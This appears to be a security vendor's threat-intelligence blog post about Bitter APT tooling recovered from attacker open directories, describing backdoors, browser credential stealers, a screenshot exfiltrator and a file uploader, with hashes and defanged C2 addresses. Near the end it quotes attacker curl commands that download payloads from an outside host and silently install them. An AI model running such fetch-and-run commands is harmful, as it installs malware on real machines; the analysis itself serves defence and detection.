Open Sesame

The Bitter APT Group has a storied history of targeted cyber espionage, primarily focusing on South Asia. Their operations have been characterized by persistent attempts to infiltrate governmental and industrial entities to gather sensitive information. The group has shown an ability to bypass security technologies by leveraging obscure file formats, as well as leveraging password-protected or otherwise encrypted payloads.

It can be difficult to track all the tools an actor uses, and disambiguate ownership between associated teams, especially without hundreds of incident responders on the bench.

That being said, sometimes the attacker makes it easy, and they leave a copy of their backdoors on a misconfigured server, which was the case of libreofficeonline.com. In addition to the payloads being available, the zip was also available, named op.zip, probably short for operation.zip. A zip file is especially useful when dealing with backdoors that may be interpreted by a handler, such as .php files. The analysis of some of these interesting files is given below.

Figure 1: Apache “open directory”

File Analysis and Identified Threats:

1. op.zip
   • The zip file named op.zip (SHA256: b8beb5e27fc339772b63ed454ec054a16b554e5c354eab8de7b4addbe238f403) was found on a command and control server, and was likely mistakenly exposed by the actor. It contains multiple files with functionalities ranging from basic backdoors to information stealers. Among these files, one exciting file is the msws.msi, which further drops the payload of ORPCBackdoor.

   

   Figure 2: op.zip files

2. msws.msi
   • This file is dropping a cab file which contains a payload of ORCPBackdoor (SHA256: 74ba5883d989566a94e7c6c217b17102f054ffbe98bc9c878a7f700f9809e910)
   • It acts as a delivery mechanism, dropping multiple files and contributing to espionage activities.
3. SearchApp.jpg
   • Constructs a URL using the username and computer name, contacting https://oraclewebonline[.]com/log.php.
   • Downloads command into C:\Users\[user]\AppData\Roaming\commands.txt, executes them, and uploads the results back to the server.

   

   Figure 3: DownloadAndExecuteCommands function of SearchApp.jpg

4. Sparrow.jpg
   • Attempts to connect to IP address 176.124.33.42 on port 443.
   • Sends an encoded "hello" message, receives commands, decodes them, and executes various operations such as listing directories, running shells, deleting files, and more.

   

   Figure 4: Main function of sparrow.jpg

5. schs.exe
   • A browser credential stealer.
   • Extracts information from Firefox and Thunderbird stores it in C:\Users\Public\Documents\ats and creates a zip file of this folder.

   

   Figure 5: Main function of schs.exe

6. scm.exe
   • Another browser credential stealer.
   • Targets Chrome, Edge, and Brave browsers, saves the data in C:\Users\Public\Documents\als and zips the folder.

   

   Figure 6: Main function of scm.jpg

7. sstn.exe
   • sstn.exe is a screenshot-capturing application. It creates a mutex to ensure that only one instance of the application runs at a time.
   • The application captures screenshots, saves them locally, resizes the images, and sends them to a remote server located at windowphotoviewer[.]com on port 443.
8. stom.jpg
   • Traverses user directories and uploads files.
   • Targets specific file extensions, uploads them to http://172.86.68.175[:]4443/upload and avoids re-uploading by checking file hashes.
9. Figlio.exe
   • Another backdoor file
   • Connects to the IP address 91.132.93.235 on port 443, sends machine name and username, and executes received commands.

   

   Figure 7: ConnectAndExecuteAsync function of figlio.exe

10. OLMAPI32.dll
    • The ORPC Backdoor does information collection of processes currently running on the host, gets detailed system information, and executes server commands.
    • The backdoor uses outlook-web.ddns[.]net as C2.

Indicators of Compromise (IOCs)

Identifying and understanding IOCs is critical in detecting and mitigating threats from the Bitter APT Group. Below are some of the key IOCs associated with their latest campaigns:

Fortuitously, while analyzing this sample set, we also came across another open directory, this time on kimfilippovision.com.

Figure 8: Open directory exposing more payloads

These rar files mainly contain their standard top level CHM droppers, and are detailed in the below appendix, although it’s worth calling out a less used PPS dropper Policy changes review.pps with the following code, shown deobfuscated for clarity.

Figure 9: rarely used PPS delivery

Noteworthy, the logs point to the next stages the attackers are installing on their victims, as noted on X. The attacker leverages custom command files for each victim it wants to install their payloads on.

curl -o C:\programdata\mvcrs.exehttp://bickrickneoservice[.]com/Z/mrcvs.exeC:\programdata\mvcrs.exe

curl -o C:\programdata\CERTg.msi https://bickrickneoservice[.]com/Z/CERTga.msi msiexec /i C:\programdata\CERTg.msi /qn /norestart

Figure 10: Manual commands executed on hosts the actors were interested in

Figure 11: Dropped files on interesting victims

In this blog, we’ve also incorporated insights from CARA, our AI-based virtual assistant. CARA leverages advanced machine learning algorithms to analyze cybersecurity threats and provide real-time insights and recommendations. CARA can interactively query information about specific threats, helping users to understand and mitigate risks more effectively. In addition, customers can also search through our TLP:WHITE data store to help them analyze payloads futher.

Figure 12: CARA showing available Bitter's simulations to test your tooling

Figure 13: CARA showing information about specific payloads

Figure 14: Customers can now search through our databases and download payloads